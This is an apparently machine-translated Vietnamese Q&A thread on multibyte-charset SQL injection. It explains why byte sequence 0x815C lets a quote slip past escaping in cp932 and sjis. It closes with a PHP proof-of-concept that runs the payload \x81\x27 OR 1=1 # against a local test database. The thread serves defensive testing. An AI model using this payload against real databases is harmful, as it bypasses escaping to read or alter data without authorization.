Làm thế nào để tạo ra một cuộc tấn công SQL injection với Shift-JIS và CP932?

Question

Tôi đang viết một số kiểm tra đơn vị để đảm bảo mã của tôi không dễ bị tấn công SQL dưới nhiều bộ ký tự khác nhau.

Theo this answer, bạn có thể tạo một lỗ hổng bằng cách tiêm \xbf\x27 bằng một trong những bảng mã sau: big5, cp932, gb2312, gbk và sjis

này là bởi vì nếu escaper của bạn không được cấu hình một cách chính xác, nó sẽ thấy 0x27 và cố gắng thoát khỏi nó sao cho nó trở thành \xbf\x5c\x27. Tuy nhiên, \xbf\x5c thực tế là một ký tự trong các bộ ký tự này, do đó báo giá (0x27) không bị thoát.

Như tôi đã khám phá qua thử nghiệm, tuy nhiên, điều này không hoàn toàn đúng. Nó hoạt động cho big5, gb2312 và gbk nhưng không phải 0xbf27 hoặc 0xbf5c là các ký tự hợp lệ trong sjis và cp932.

Cả

mb_strpos("abc\xbf\x27def","'",0,'sjis') 

và

mb_strpos("abc\xbf\x27def","'",0,'cp932') 

Return 4. tức là, PHP không thấy \xbf\x27 là một ký tự đơn. Điều này trả về false cho big5, gb2312 và gbk.

Ngoài ra, đây:

mb_strlen("\xbf\x5c",'sjis') 

Returns 2 (nó trả 1 cho gbk).

Vì vậy, câu hỏi đặt ra là: có một chuỗi ký tự khác làm cho sjis và cp932 dễ bị tiêm SQL hay không thực sự là không phải là dễ bị tổn thương không? hoặc là nói dối PHP, tôi hoàn toàn nhầm lẫn, và MySQL sẽ giải thích điều này hoàn toàn khác nhau?

Answer 1

The devil là tại các chi tiết ... chúng ta hãy bắt đầu với cách answer in question mô tả danh sách các bộ ký tự dễ bị tổn thương:

Đối với cuộc tấn công này để làm việc, chúng ta cần mã hóa mà máy chủ của kỳ vọng vào kết nối cả hai để mã hóa ' như trong ASCII tức là 0x27và để có một số ký tự có byte cuối cùng là ASCII \ tức là 0x5c. Khi nó quay ra, có 5 mã hóa như vậy được hỗ trợ trong MySQL 5.6 theo mặc định: big5, cp932, gb2312, gbk và sjis. Chúng tôi sẽ chọn gbk tại đây.

Điều này cho chúng tôi ngữ cảnh - 0xbf5c được sử dụng làm ví dụ cho gbk, không phải là ký tự chung để sử dụng cho tất cả 5 bộ ký tự.
Nó chỉ xảy ra khi cùng một chuỗi byte cũng là một ký tự hợp lệ theo big5 và gb2312.

Tại thời điểm này, câu hỏi của bạn trở nên dễ dàng như này:

Những chuỗi byte là một nhân vật có giá trị dưới cp932 và sjis và kết thúc vào 0x5c?

Để công bằng, hầu hết các tìm kiếm trên google mà tôi đã thử cho các bộ ký tự này không cung cấp bất kỳ kết quả hữu ích nào. Nhưng tôi đã tìm thấy this CP932.TXT file, trong đó nếu bạn tìm kiếm '5c ' (với không gian đó), bạn sẽ nhảy đến dòng này:

0x815C 0x2015 #HORIZONTAL BAR

Và chúng tôi có một người chiến thắng ! :)

Some Oracle document khẳng định rằng 0x815c là nhân vật tương tự cho cả hai cp932 và sjis và PHP nhận nó quá:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis")); 
int(1) 
int(1) 

Dưới đây là một kịch bản PoC cho cuộc tấn công:

<?php 
$username = 'username'; 
$password = 'password'; 

$mysqli = new mysqli('localhost', $username, $password); 
foreach (array('cp932', 'sjis') as $charset) 
{ 
     $mysqli->query("SET NAMES {$charset}"); 
     $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}"); 
     $mysqli->query("USE {$charset}_db"); 
     $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)"); 
     $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')"); 

     $input = "\x81\x27 OR 1=1 #"; 
     $input = $mysqli->real_escape_string($input); 
     $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1"; 
     $result = $mysqli->query($query); 
     if ($result->num_rows > 1) 
     { 
       echo "{$charset} exploit successful!\n"; 
     } 

     $mysqli->query("DROP DATABASE {$charset}_db"); 
}